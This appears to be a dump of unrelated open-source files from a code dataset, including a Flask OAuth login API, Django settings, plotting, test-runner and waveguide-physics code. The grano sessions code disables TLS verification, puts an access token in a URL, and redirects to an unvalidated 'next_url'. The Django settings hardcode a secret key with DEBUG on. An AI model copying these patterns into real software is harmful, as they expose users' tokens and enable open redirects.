information and initial state.
sequence_feature_columns: An iterable containing all the feature columns
describing sequence features. All items in the set should be instances
of classes derived from `FeatureColumn`.
context_feature_columns: An iterable containing all the feature columns
describing context features i.e. features that apply accross all time
steps. All items in the set should be instances of classes derived from
`FeatureColumn`.
weight_collections: List of graph collections to which weights are added.
scope: Optional scope, passed through to parsing ops.
Returns:
A `Tensor` of dtype `float32` and shape `[batch_size, padded_length, ?]`.
This will be used as input to an RNN.
"""
features = features.copy()
features.update(layers.transform_features(
features,
list(sequence_feature_columns) + list(context_feature_columns or [])))
sequence_input = layers.sequence_input_from_feature_columns(
columns_to_tensors=features,
feature_columns=sequence_feature_columns,
weight_collections=weight_collections,
scope=scope)
if context_feat |
clkao/grano | grano/views/sessions_api.py | Python | mit | 5,328 | 0.002252 | import requests
from flask import session, Blueprint, redirect
from flask import request
from grano import authz
from grano.lib.exc import BadRequest
from grano.lib.serialisation import jsonify
from grano.views.cache import validate_cache
from grano.core import db, url_for, app
from grano.providers import github, twitter, facebook
from grano.model import Account
from grano.logic import accounts
blueprint = Blueprint('sessions_api', __name__)
@blueprint.route('/api/1/sessions', methods=['GET'])
def status():
permissions = {}
if authz.logged_in():
for permission in request.account.permissions:
permissions[permission.project.slug] = {
'reader': permission.reader,
'editor': permission.editor,
'admin': permission.admin
}
keys = {
'p': repr(permissions),
'i': request.account.id if authz.logged_in() else None
}
validate_cache(keys=keys)
return jsonify({
'logged_in': authz.logged_in(),
'api_key': request.account.api_key if authz.logged_in() else None,
'account': request.account if request.account else None,
'permissions': permissions
})
def provider_not_enabled(name):
return jsonify({
'status': 501,
'name': 'Provider not configured: %s' % name,
'message': 'There are no OAuth credentials given for %s' % name,
}, status=501)
@blueprint.route('/api/1/sessions/logout', methods=['GET'])
def logout():
#authz.require(authz.logged_in())
session.clear()
return redirect(request.args.get('next_url', '/'))
@blueprint.route('/api/1/sessions/login/github', methods=['GET'])
def github_login():
if not app.config.get('GITHUB_CLIENT_ID'):
return provider_not_enabled('github')
callback=url_for('sessions_api.github_authorized')
session.clear()
if not request.args.get('next_url'):
raise BadRequest("No 'next_url' is specified.")
session['next_url'] = request.args.get('next_url')
return github.authorize(callback=callback)
@blueprint.route('/api/1/sessions/callback/github', methods=['GET'])
@github.authorized_handler
def github_authorized(resp):
next_url = session.get('next_url', '/')
if resp is None or not 'access_token' in resp:
return redirect(next_url)
access_token = resp['access_token']
session['access_token'] = access_token, ''
res = requests.get('https://api.github.com/user?access_token=%s' % access_token,
verify=False)
data = res.json()
account = Account.by_github_id(data.get('id'))
data_ = {
'full_name': data.get('name'),
'login': data.get('login'),
'email': data.get('email'),
'github_id': data.get('id')
}
account = accounts.save(data_, account=account)
db.session.commit()
session['id'] = account.id
return redirect(next_url)
@blueprint.route('/api/1/sessions/login/twitter', methods=['GET'])
def twitter_login():
if not app.config.get('TWITTER_API_KEY'):
return provider_not_enabled('twitter')
callback=url_for('sessions_api.twitter_authorized')
session.clear()
if not request.args.ge | t('next_url'):
raise BadRequest("No | 'next_url' is specified.")
session['next_url'] = request.args.get('next_url')
return twitter.authorize(callback=callback)
@blueprint.route('/api/1/sessions/callback/twitter', methods=['GET'])
@twitter.authorized_handler
def twitter_authorized(resp):
next_url = session.get('next_url', '/')
if resp is None or not 'oauth_token' in resp:
return redirect(next_url)
session['twitter_token'] = (resp['oauth_token'],
resp['oauth_token_secret'])
res = twitter.get('users/show.json?user_id=%s' % resp.get('user_id'))
account = Account.by_twitter_id(res.data.get('id'))
data_ = {
'full_name': res.data.get('name'),
'login': res.data.get('screen_name'),
'twitter_id': res.data.get('id')
}
account = accounts.save(data_, account=account)
db.session.commit()
session['id'] = account.id
return redirect(next_url)
@blueprint.route('/api/1/sessions/login/facebook', methods=['GET'])
def facebook_login():
if not app.config.get('FACEBOOK_APP_ID'):
return provider_not_enabled('facebook')
callback=url_for('sessions_api.facebook_authorized')
session.clear()
if not request.args.get('next_url'):
raise BadRequest("No 'next_url' is specified.")
session['next_url'] = request.args.get('next_url')
return facebook.authorize(callback=callback)
@blueprint.route('/api/1/sessions/callback/facebook', methods=['GET'])
@facebook.authorized_handler
def facebook_authorized(resp):
next_url = session.get('next_url', '/')
if resp is None or not 'access_token' in resp:
return redirect(next_url)
session['facebook_token'] = (resp.get('access_token'), '')
data = facebook.get('/me').data
account = Account.by_facebook_id(data.get('id'))
data_ = {
'full_name': data.get('name'),
'login': data.get('username'),
'email': data.get('email'),
'facebook_id': data.get('id')
}
account = accounts.save(data_, account=account)
db.session.commit()
session['id'] = account.id
return redirect(next_url)
|
astrofrog/glue-vispy-viewers | glue_vispy_viewers/scatter/multi_scatter.py | Python | bsd-2-clause | 5,723 | 0.000175 | from __future__ import absolute_import, division, print_function
from contextlib import contextmanager
import numpy as np
from matplotlib.colors import ColorConverter
from ..extern.vispy import scene
from glue.external import six
class MultiColorScatter(scene.visuals.Markers):
"""
This is a helper class to make it easier to show multiple markers at
specific positions and control exactly which marker should be on top of
which.
"""
def __init__(self, *args, **kwargs):
self.layers = {}
self._combined_data = None
self._skip_update = False
super(MultiColorScatter, self).__init__(*args, **kwargs)
@contextmanager
def delay_update(self):
self._skip_update = True
yield
self._skip_update = False
def allocate(self, label):
if label in self.layers:
raise ValueError("Layer {0} already exists".format(label))
else:
self.layers[label] = {'data': None,
'mask': None,
'color': np.asarray((1., 1., 1.)),
'alpha': 1.,
'zorder': lambda: 0,
'size': 10,
'visible': True}
def deallocate(self, label):
self.layers.pop(label)
self._update()
def set_data_values(self, label, x, y, z):
"""
Set the position of the datapoints
"""
# TODO: avoid re-allocating an array every time
self.layers[label]['data'] = np.array([x, y, z]).transpose()
self._update()
def set_visible(self, label, visible):
self.layers[label]['visible'] = visible
self._update()
def set_mask(self, label, mask):
self.layers[label]['mask'] = mask
self._update()
def set_size(self, label, size):
if not np.isscalar(size) and size.ndim > 1:
raise Exception("size should be a 1-d array")
self.layers[label]['size'] = size
self._update()
def set_color(self, label, rgb):
if isinstance(rgb, six.string_types):
rgb = ColorConverter().to_rgb(rgb)
self.layers[label]['color'] = np.asarray(rgb)
self._update()
def set_alpha(self, label, alpha):
self.layers[label]['alpha'] = alpha
self._update()
def set_zorder(self, label, zorder):
self.layers[label]['zorder'] = zorder
self._update()
def _update(self):
if self._skip_update:
return
data = []
colors = []
sizes = []
for label in sorted(self.layers, key=lambda x: self.layers[x]['zorder']()):
la | yer = self.layers[label]
if not layer['visible'] or layer['data'] is None:
continue
if layer['mask'] is None:
n_points = layer['data'].shape[0]
else:
n_points = np.sum(layer['mas | k'])
if n_points > 0:
# Data
if layer['mask'] is None:
data.append(layer['data'])
else:
data.append(layer['data'][layer['mask'], :])
# Colors
if layer['color'].ndim == 1:
rgba = np.hstack([layer['color'], 1])
rgba = np.repeat(rgba, n_points).reshape(4, -1).transpose()
else:
if layer['mask'] is None:
rgba = layer['color'].copy()
else:
rgba = layer['color'][layer['mask']]
rgba[:, 3] *= layer['alpha']
colors.append(rgba)
# Sizes
if np.isscalar(layer['size']):
size = np.repeat(layer['size'], n_points)
else:
if layer['mask'] is None:
size = layer['size']
else:
size = layer['size'][layer['mask']]
sizes.append(size)
if len(data) == 0:
self.visible = False
return
else:
self.visible = True
data = np.vstack(data)
colors = np.vstack(colors)
sizes = np.hstack(sizes)
self.set_data(data, edge_color=colors, face_color=colors, size=sizes)
def draw(self, *args, **kwargs):
if len(self.layers) == 0:
return
else:
try:
super(MultiColorScatter, self).draw(*args, **kwargs)
except Exception:
pass
if __name__ == "__main__": # pragma: nocover
from ..extern.vispy import app, scene
canvas = scene.SceneCanvas(keys='interactive')
view = canvas.central_widget.add_view()
view.camera = scene.TurntableCamera(up='z', fov=60)
x = np.random.random(20)
y = np.random.random(20)
z = np.random.random(20)
multi_scat = MultiColorScatter(parent=view.scene)
multi_scat.allocate('data')
multi_scat.set_zorder('data', lambda: 0)
multi_scat.set_data_values('data', x, y, z)
multi_scat.allocate('subset1')
multi_scat.set_mask('subset1', np.random.random(20) > 0.5)
multi_scat.set_color('subset1', 'red')
multi_scat.set_zorder('subset1', lambda: 1)
multi_scat.allocate('subset2')
multi_scat.set_mask('subset2', np.random.random(20) > 0.5)
multi_scat.set_color('subset2', 'green')
multi_scat.set_zorder('subset2', lambda: 2)
multi_scat.set_alpha('subset2', 0.5)
multi_scat.set_size('subset2', 20)
axis = scene.visuals.XYZAxis(parent=view.scene)
canvas.show()
app.run()
|
djangothon/django-engage | django_engage/settings.py | Python | mit | 3,040 | 0 | """
Django settings for django_engage project.
Generated by 'django-admin startproject' using Djang | o 1.8.4.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os | .path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '4%z9k*!y3p*yba5*^-ve^4^2rxol0f4fqvdkq41&tc5unkz=#^'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'swampdragon',
'engage',
'testapp',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'django_engage.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.media',
'django.template.context_processors.static',
],
'debug': True
},
},
]
WSGI_APPLICATION = 'django_engage.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
# SwampDragon settings
SWAMP_DRAGON_CONNECTION = (
'swampdragon_auth.socketconnection.HttpDataConnection',
'/data'
)
DRAGON_URL = 'http://localhost:9999/'
|
Splawik/pytigon | pytigon/prj/scheditor/sched/models.py | Python | lgpl-3.0 | 531 | 0.001883 | import django
from django.db import models
from pyti | gon_lib.schdjangoext.fields import *
from pytigon_lib.schdjangoext.models import *
import pytigon_lib.schdjango | ext.fields as ext_models
from pytigon_lib.schtools import schjson
from django.utils.translation import gettext_lazy as _
from django.contrib import admin
import os, os.path
import sys
from pytigon_lib.schhtml.htmltools import superstrip
from schwiki.models import *
from schcommander.models import *
from schtasks.models import *
from schtools.models import *
|
fluidinfo/Tickery | setup.py | Python | apache-2.0 | 1,202 | 0 | #!/usr/bin/env python
import glob
from distutils.core import setup
from tickery.version import version
# Where Tickery files such as the HTML, Javascript, and the Twisted plugin
# should be installed on the destination host:
TICKERY_ROOT = '/opt/tickery'
setup(name='tickery',
version=version,
scripts=glob.glob('bin/*.py'),
packages=['tickery', 'tickery.test'],
data_files=[
('%s/twisted/plugins' % TICKERY_ROOT,
['twisted/plugins/tickery_service.py']),
('%s/tickery' % TICKERY_ROOT,
['tickery/Makefile']),
# Public (www) files:
('%s/tickery/www' % TICKERY_ROOT,
['tickery/www/Makefile'] + glob.glob('tickery/www/*.py')),
('%s/tickery/www/public' % TICKERY_ROOT,
glob.glob('tickery/www/public/*')),
# Admin files:
('%s/tickery/admin' % TICKERY_ROOT,
['tickery/admin/Makefile'] + glob.glob('tickery/admin/*.py')),
('%s/tickery/admin/public' % TICKERY_ROOT,
glob.glob('tickery/admin/public/*'))
],
maintainer='Fluidinfo Inc.',
maintainer_email='info@fluidinf | o.com',
url= | 'http://fluidinfo.com/')
|
AntonelliLab/seqcap_processor | secapr/utils.py | Python | mit | 531 | 0.011299 | #!/usr/bin/env python3
# -*- co | ding: utf-8 -*-
"""
Created on Tue Oct 15 17:08:10 2019
@author: Tobias Andermann (tobias.andermann@bioenv.gu.se)
"""
import numpy as np
np.set_printoptions(suppress=True)
import pandas as pd
import matplotlib.pyplot as plt
import os
import argparse
class CompletePath(argparse.Action):
"""give the full path of an input file/folder"""
def __call__(self, parser, | namespace, values, option_string=None):
setattr(namespace, self.dest, os.path.abspath(os.path.expanduser(values)))
|
cescobarresi/ciscoreputation | ciscoreputation/__about__.py | Python | mit | 1,212 | 0.003344 | # encoding: utf-8
import os.path
__all__ = [
"__title__", "__summary__", "__uri__", "__version__",
"__author__", "__email__", "__license__", "__copyright__",
]
try:
base_dir = os.path.dirname(os.path.abspath(__file__))
except NameError:
base_dir = None
__title__ = "ciscoreputation"
__summa | ry__ = "Get the Cisco's senderbase.org reputation for a hostname or ip address"
__uri__ = "https://github.com/cescobarresi/ciscoreputation"
# Versioning is a 3-part MAJOR.MINOR.MAINTENANCE numbering scheme, where the project author increments:
#
# MAJOR version when they make incompatible API changes,
# MINOR versio | n when they add functionality in a backwards-compatible manner, and
# MAINTENANCE version when they make backwards-compatible bug fixes.
# zero or more dev releases (denoted with a ”.devN” suffix)
# zero or more alpha releases (denoted with a ”.aN” suffix)
# zero or more beta releases (denoted with a ”.bN” suffix)
# zero or more release candidates (denoted with a ”.rcN” suffix)
#
__version__ = "2.1.4"
__author__ = "Francesco Barresi"
__email__ = "francescobarresi@bbfactory.it"
__license__ = "MIT"
__copyright__ = "2018 %s" % __author__
|
sorz/isi | store/category/migrations/0001_initial.py | Python | mit | 1,172 | 0.003413 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),
( | 'name', models.CharField(max_length=255, verbose_name='Category Name')),
('description', models.TextField(null=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='PropertyName',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_cr | eated=True, serialize=False)),
('name', models.CharField(max_length=255, verbose_name='Property Name')),
('description', models.TextField(null=True)),
('category', models.ForeignKey(to='category.Category')),
],
options={
},
bases=(models.Model,),
),
]
|
Cornices/cornice.ext.swagger | cornice_swagger/converters/__init__.py | Python | apache-2.0 | 620 | 0.001613 | """
This module handles the conversion between colander obj | ect schemas and swagger
object schemas.
"""
from cornice_swagger.converters.schema import TypeConversionDispatcher
from cornice_swagger.converters.parameters import ParameterConversionDispatcher
def convert_schema(schema_node):
dispatcher = TypeConversionDispatcher()
converted = dispatcher(schema_node)
return converted
def convert_parameter(location, schema_node, definition_handler=convert_schema):
dispatcher = ParameterConversionDispatcher(definition_handler)
converte | d = dispatcher(location, schema_node)
return converted
|
loopCM/chromium | chrome/test/chromedriver/run_java_tests.py | Python | bsd-3-clause | 10,860 | 0.009024 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Runs the WebDriver Java acceptance tests.
This script is called from chrome/test/chromedriver/run_all_tests.py and reports
results using the buildbot annotation scheme.
For ChromeDriver documentation, refer to http://code.google.com/p/chromedriver.
"""
import optparse
import os
import shutil
import sys
import xml.dom.minidom as minidom
_THIS_DIR = os.path.abspath(os.path.dirname(__file__))
sys.path.insert(0, os.path.join(_THIS_DIR, os.pardir, 'pylib'))
from common import chrome_paths
from common import util
import test_environment
class TestResult(object):
"""A result for an attempted single test case."""
def __init__(self, name, time, failure):
"""Initializes a test result.
Args:
name: the full name of the test.
time: the amount of time the test ran, in seconds.
failure: the test error or failure message, or None if the test passed.
"""
self._name = name
self._time = time
self._failure = failure
def GetName(self):
"""Returns the test name."""
return self._name
def GetTime(self):
"""Returns the time it took to run the test."""
return self._time
def IsPass(self):
"""Returns whether the test passed."""
return self._failure is None
def GetFailureMessage(self):
"""Returns the test failure message, or None if the test passed."""
return self._failure
def _Run(java_tests_src_dir, test_filter,
chromedriver_path, chrome_path, android_package,
verbose, debug):
"""Run the WebDriver Java tests and return the test results.
Args:
java_tests_src_dir: the java test source code directory.
test_filter: the filter to use when choosing tests to run. Format is same
as Google C++ Test format.
chromedriver_path: path to ChromeDriver exe.
chrome_path: path to Chrome exe.
android_package: name of Chrome's Android package.
verbose: whether the output should be verbose.
debug: whether the tests should wait until attached by a debugger.
Returns:
A list of |TestResult|s.
"""
test_dir = util.MakeTempDir()
keystore_path = ('java', 'client', 'test', 'keystore')
required_dirs = [keystore_path[:-1],
('javascript',),
('third_party', 'closure', 'goog'),
('third_party', 'js')]
for required_dir in required_dirs:
os.makedirs(os.path.join(test_dir, *required_dir))
test_jar = 'test-standalone.jar'
class_path = test_jar
shutil.copyfile(os.path.join(java_tests_src_dir, 'keystore'),
os.path.join(test_dir, *keystore_path))
util.Unzip(os.path.join(java_tests_src_dir, 'common.zip'), test_dir)
shutil.copyfile(os.path.join(java_tests_src_dir, test_jar),
os.path.join(test_dir, test_jar))
sys_props = ['selenium.browser=chrome',
'webdriver.chrome.driver=' + os.path.abspath(chromedriver_path)]
if chrome_path is not None:
sys_props += ['webdriver.chrome.binary=' + os.path.abspath(chrome_path)]
if android_package is not None:
sys_props += ['webdriver.chrome.android_package=' + android_package]
if test_filter:
# Test jar actually takes a regex. Convert from glob.
test_filter = test_filter.replace('*', '.*')
sys_props += ['filter=' + test_filter]
jvm_args = []
if debug:
jvm_args += ['-agentlib:jdwp=transport=dt_socket,server=y,suspend=y,'
'address=33081']
# Unpack the sources into the test directory and add to the class path
# for ease of debugging, particularly with jdb.
util.Unzip(os.path.join(java_tests_src_dir, 'test-nodeps-srcs.jar'),
test_dir)
class_path += ':' + test_dir
return _RunAntTest(
test_dir, 'org.openqa.selenium.chrome.ChromeDriverTests',
class_path, sys_props, jvm_args, verbose)
def _RunAntTest(test_dir, test_class, class_path, sys_props, jvm_args, verbose):
"""Runs a single Ant JUnit test suite and returns the |TestResult|s.
Args:
test_dir: the directory to run the tests in.
test_class: the name of the JUnit test suite class to run.
class_path: the Java class path used when running the tests, colon delimited
sys_props: Java system properties to set when running the tests.
jvm_args: Java VM command line args to use.
verbose: whether the output should be verbose.
Returns:
A list of |TestResult|s.
"""
def _CreateBuildConfig(test_name, results_file, class_path, junit_props,
sys_props, jvm_args):
def _SystemPropToXml(prop):
key, value = prop.split('=')
return '<sysproperty key="%s" value="%s"/>' % (key, value)
def _JvmArgToXml(arg):
return '<jvmarg value="%s"/>' % arg
return '\n'.join([
'<project>',
' <target name="test">',
' <junit %s>' % ' '.join(junit_props),
' <formatter type="xml"/>',
' <classpath>',
' <pathelement path="%s"/>' % class_path,
' </classpath>',
' ' + '\n '.join(map(_SystemPropToXml, sys_props)),
' ' + '\n '.join(map(_JvmArgToXml, jvm_args)),
' <test name="%s" outfile="%s"/>' % (test_name, results_file),
' </junit>',
' </target>',
'</project>'])
def _ProcessResults(results_path):
doc = minidom.parse(results_path)
tests = []
for test in doc.getElementsByTagName('testcase'):
name = test.getAttribute('classname') + '.' + test.getAttribute('name')
| time = test.getAttribute('time')
failure = None
error_nodes = test.getElementsByTagName('error')
failure_nodes = test.getElementsByTagName('failure')
if error_nodes:
failure = error_nodes[0].childNodes[0].nodeValue
elif failure_nodes:
failure = failure_nodes[0].childNodes[0].nodeValue
tests += [TestResult(name, time, failure)]
return tests
juni | t_props = ['printsummary="yes"',
'fork="yes"',
'haltonfailure="no"',
'haltonerror="no"']
if verbose:
junit_props += ['showoutput="yes"']
ant_file = open(os.path.join(test_dir, 'build.xml'), 'w')
ant_file.write(_CreateBuildConfig(
test_class, 'results', class_path, junit_props, sys_props, jvm_args))
ant_file.close()
if util.IsWindows():
ant_name = 'ant.bat'
else:
ant_name = 'ant'
code = util.RunCommand([ant_name, 'test'], cwd=test_dir)
if code != 0:
print 'FAILED to run java tests of %s through ant' % test_class
return
return _ProcessResults(os.path.join(test_dir, 'results.xml'))
def PrintTestResults(results):
"""Prints the given results in a format recognized by the buildbot."""
failures = []
failureNames = []
for result in results:
if not result.IsPass():
failures += [result]
failureNames += ['.'.join(result.GetName().split('.')[-2:])]
print 'Ran %s tests' % len(results)
print 'Failed %s:' % len(failures)
for result in failures:
print '=' * 80
print '=' * 10, result.GetName(), '(%ss)' % result.GetTime()
print result.GetFailureMessage()
if failures:
print '@@@STEP_TEXT@Failed %s tests@@@' % len(failures)
print 'Rerun failing tests with filter:', ':'.join(failureNames)
return len(failures)
def main():
parser = optparse.OptionParser()
parser.add_option(
'', '--verbose', action="store_true", default=False,
help='Whether output should be verbose')
parser.add_option(
'', '--debug', action="store_true", default=False,
help='Whether to wait to be attached by a debugger')
parser.add_option(
'', '--chromedriver', type='string', default=None,
help='Path to a build of the chromedriver library(REQUIRED!)')
parser.add_option(
'', '--chrome', type='string', default=None,
help='Path to a build of the chrome binary')
parser.add_option(
'', '--chrome-version', default='HEAD',
help='Version of chrome. Default is \'HEAD\'')
parser.add_option(
|
Tayamarn/socorro | socorro/unittest/external/es/test_analyzers.py | Python | mpl-2.0 | 1,852 | 0 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from socorro.lib import datetimeutil
from socorro.unittest.external.es.base import (
ElasticsearchTestCase,
SuperSearchWithFields,
minimum_es_version,
)
# Uncomment these lines to decrease verbosity of the elasticsearch library
# while running unit test | s.
# import logging
# logging.getLogger('elasticsearch').setLevel(logging.ERROR)
# logging.getLogger('requests').setLevel(logging.ERROR)
class IntegrationTestAnalyzers(ElasticsearchTestCase):
"""Test the custom analyzers we create in our indices. """
def setUp(self):
super(IntegrationTestAnalyzers, self).setUp()
self.api = SuperSearchWithFields(config=self.config)
self.now = datetimeutil.utc_now()
@minimum_es_version('1.0')
def test_semicolon_keywords(self):
| """Test the analyzer called `semicolon_keywords`.
That analyzer creates tokens (terms) by splitting the input on
semicolons (;) only.
"""
self.index_crash({
'date_processed': self.now,
'app_init_dlls': '/path/to/dll;;foo;C:\\bar\\boo',
})
self.index_crash({
'date_processed': self.now,
'app_init_dlls': '/path/to/dll;D:\\bar\\boo',
})
self.refresh_index()
res = self.api.get(
app_init_dlls='/path/to/dll',
_facets=['app_init_dlls'],
)
assert res['total'] == 2
assert 'app_init_dlls' in res['facets']
facet_terms = [x['term'] for x in res['facets']['app_init_dlls']]
assert '/path/to/dll' in facet_terms
assert 'c:\\bar\\boo' in facet_terms
assert 'foo' in facet_terms
|
jruberg/Pyty | test/unit_tests_core.py | Python | mit | 5,812 | 0.004646 | import unittest
import ast
import sys
import logging
from datetime import datetime
import ast
# Include src in the Python search path.
sys.path.insert(0, '../src')
from ast_extensions import TypeDecASTModule
from check import (check_expr, check_mod, expr_template, call_function)
from parse_file import parse_type_decs
from ptype import PType
from errors import TypeUnspecifiedError, TypeIncorrectlySpecifiedError
from settings import (TEST_CODE_SUBDIR, DEBUG_SUBJECT_FILE, DEBUG_UNTYPED_AST,
DEBUG_TYPED_AST, DEBUG_TYPEDECS)
from logger import Logger, announce_file
from util import log_center
# these should be redundant, but they're necessary to refer to the specific log
# objects.
import ast_extensions
import parse_file
import check
import infer
"""
This is just the core of the unit testing file. generate_tests.py must be run
to fill this file with the several unit tests (each of which tests one source
code file in the test_files directory).
"""
announce_file("unit_tests_core.py")
log = check.log = parse_file.log = infer.log = Logger()
class PytyTests(unittest.TestCase):
def _check_expr(self, s, expr_kind, typ, expected):
"""Typechecks the string C{s} as an C{expr_type} expression."""
a = ast.parse(s).body[0].value
f = expr_template % expr_kind
if expected == "pass" or expected == "fail":
t = PType.from_str(typ)
if expected == "pass":
self.assertEqual(True, call_function(f, a, t, {}),
"%s should typecheck as %s but does not." % (s,t))
elif expected == "fail":
self.assertEqual(False, call_function(f, a, t, {}),
"%s shouldn't typecheck as %s but does." % (s, t))
elif issubclass(eval(expected), Exception):
# if the expected value is an error, then make sure it
# raises the right error.
try:
t = PType.from_str(typ)
call_function(f, a, t, {})
except eval(expected):
pass
else:
self.fail("Should have raised error %s, but does not. (%s)."
% (expected, s))
else:
raise TestFileFormatError("Expression tests can only be" + \
" specified as passing, failing, or raising an error " + \
" specified in errors.py, but this test was specified " + \
" as expecting: " + expected)
def _parse_and_check_mod(self, filename):
with open(filename, 'r') as f:
text = f.read()
debug_file = TEST_CODE_SUBDIR + DEBUG_SUBJECT_FILE
if filename == debug_file:
log.enter_debug_file()
else:
log.exit_debug_file()
log.debug("--- v File : " + filename + " v ---\n" + text + "--- ^ File text ^ ---")
untyped_ast = ast.parse(text)
log.debug((log_center("v Untyped AST v") + str(untyped_ast) +
log_center("^ Untyped AST ^")), DEBUG_UNTYPED_AST)
typedecs = parse_type_decs(filename)
log.debug((log_center("v TypeDecs v") + str(typedecs) +
log_center("^ TypeDecs ^")), DEBUG_TYPEDECS)
typed_ast = TypeDecASTModule(untyped_ast, typedecs)
log.debug((log_center("v TypedAST v") + str(typed_ast) +
log_center("^ TypedAST ^")), DEBUG_TYPED_AST)
return check_mod(typed_ast.tree)
def _check_mod(self, filename):
"""Typechecks the contents of file C{filename} as a
module. The file will contain a header of the form '### Pass'
to indicate whether the module is expected to pass or fail
typechecking or throw a specified error.
"""
with open(filename, 'r') as f:
expected = f.readline().strip('###').strip()
text = f.read()
if expected == "pass":
# the third parameter is a message displayed if assertion fails.
self.assertEqual(True, self._parse_and_check_mod(filename),
"Should typecheck, but does not:\n%s" % text)
elif expected == "fail":
# the third parameter is a message displayed if assertion fails.
self.assertEqual(False, self._parse_and_check_mod(filename),
"Shouldn't typecheck, but does:\n%s" % text)
else:
# in generate_tests.py, we should have already ensured that the
# expected string is "pass", "fail", or a valid error name, so we
# should be able to parse the error name at this point, and if not
# then we have other issues.
try:
err = eval(expected)
except NameError:
# at this point, expected better be a valid error name.
assert(False)
# at this point, the error better actually be a subclass of
# Exception, since generate.py tests will already throw errors if
# improper errors are specified.
assert(issubclass(err, Exception))
try:
result = self._parse_and_check_mod(filename)
self.fail("Should raise error %s, but instead returned %s:\n%s"
% (expec | ted, result, text.strip('\n')))
except err:
pass
except AssertionError | as e:
self.fail(e)
except Exception as e:
self.fail("Should have raised %s, but instead raised %s (%s):\n%s" %
(expected, e.__class__.__name__, e, text.strip('\n')))
##### Generated unit tests will go below here
##### Generated unit tests will go above here
if __name__ == '__main__':
unittest.main()
|
mnishida/PyMWM | src/pymwm/cylinder/__init__.py | Python | mit | 26,692 | 0.000525 | from __future__ import annotations
import cmath
import numpy as np
import psutil
import ray
import scipy.special as ssp
from pymwm.utils import cylinder_utils
from pymwm.waveguide import Database, Sampling, Waveguide
from .samples import Samples, SamplesForRay, SamplesLowLoss, SamplesLowLossForRay
class Cylinder(Waveguide):
"""A class defining a cylindrical waveguide."""
def __init__(self, params):
"""Init Cylinder class.
Args:
params: A dict whose keys and values are as follows:
'core': A dict of the setting parameters of the core:
'shape': A string indicating the shape of the core.
'size': A float indicating the radius of the circular cross
section [um].
'fill': A dict of the parameters of the core Material.
'clad': A dict of the parameters of the clad Material.
'bounds': A dict indicating the bounds of database.interpolation
and its keys and values are as follows:
'wl_max': A float indicating the maximum wavelength [um]
'wl_min': A float indicating the minimum wavelength [um]
'wl_imag': A float indicating the maximum value of
abs(c / f_imag) [um] where f_imag is the imaginary part
of the frequency.
'modes': A dict of the settings for calculating modes:
'wl_max': A float indicating the maximum wavelength [um]
(default: 5.0)
'wl_min': A float indicating the minimum wavelength [um]
(default: 0.4)
'wl_imag': A float indicating the maximum value of
abs(c / f_imag) [um] where f_imag is the imaginary part
of the frequency. (default: 5.0)
'dw': A float indicating frequency interval
[rad c / 1um]=[2.99792458e14 rad / s]
(default: 1 / 64).
'num_n': An integer indicating the number of orders of
modes.
'num_m': An integer indicating the number of modes in each
order and polarization.
'ls': A list of characters chosen from "h" (horizontal
polarization) and "v" (vertical polarization).
"""
super().__init__(params)
self.u_pec, self.jnu_pec, self.jnpu_pec = self.u_jnu_jnpu_pec(
self.num_n, self.num_m
)
def get_alphas(self, alpha_list: list[tuple[str, int, int]]) -> dict:
alphas: dict = {"h": [], "v": []}
for alpha in [("E", 0, m) for m in range(1, self.num_m + 1)]:
if alpha in alpha_list:
alphas["v"].append(alpha)
for alpha in [
("E", n, m) for n in range(1, self.num_n) for m in range(1, self.num_m + 1)
]:
if alpha in alpha_list:
alphas["h"].append(alpha)
alphas["v"].append(alpha)
for alpha in [("M", 0, m) for m in range(1, self.num_m + 1)]:
if alpha in alpha_list:
alphas["h"].append(alpha)
for alpha in [
("M", n, m) for n in range(1, self.num_n) for m in range(1, self.num_m + 1)
]:
if alpha in alpha_list:
al | phas["h"].append(alpha)
alphas["v"].append(alpha)
return alphas
def betas_convs_samples(self, params: dict) -> tuple[dict, dict, Samples]:
im_factor = self.clad.im_factor
